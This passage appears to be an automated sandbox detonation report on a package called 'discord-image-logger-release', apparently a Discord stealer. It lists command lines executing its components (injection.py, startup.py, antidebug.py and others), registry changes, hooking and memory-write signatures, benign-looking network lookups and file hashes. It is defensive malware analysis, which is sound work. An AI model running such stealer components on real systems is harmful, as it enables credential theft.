| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
92s
Max time network
130s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
91s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2196 wrote to memory of 2956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2196 wrote to memory of 2956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2196 wrote to memory of 2956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | d13b10193fc5325a324553bd5b2f758f |
| SHA1 | 7cc11c8b658c72cfb37befe8dcdbee47143d24d7 |
| SHA256 | 7d7e519c1b253714a12aff619ab1bce9bc2837e24e3c9c3e20aacd57c55a094e |
| SHA512 | b4442303c79ece053587ec3b37cf8a71567d27f31d7f77660ae6265f88faf99c39c1008a6e26bd81082580870eb3d67bbf43a1dce1e5b38fc4261f896acc0f87 |
Analysis: behavioral4
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| GB | 2.18.66.169:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | | udp |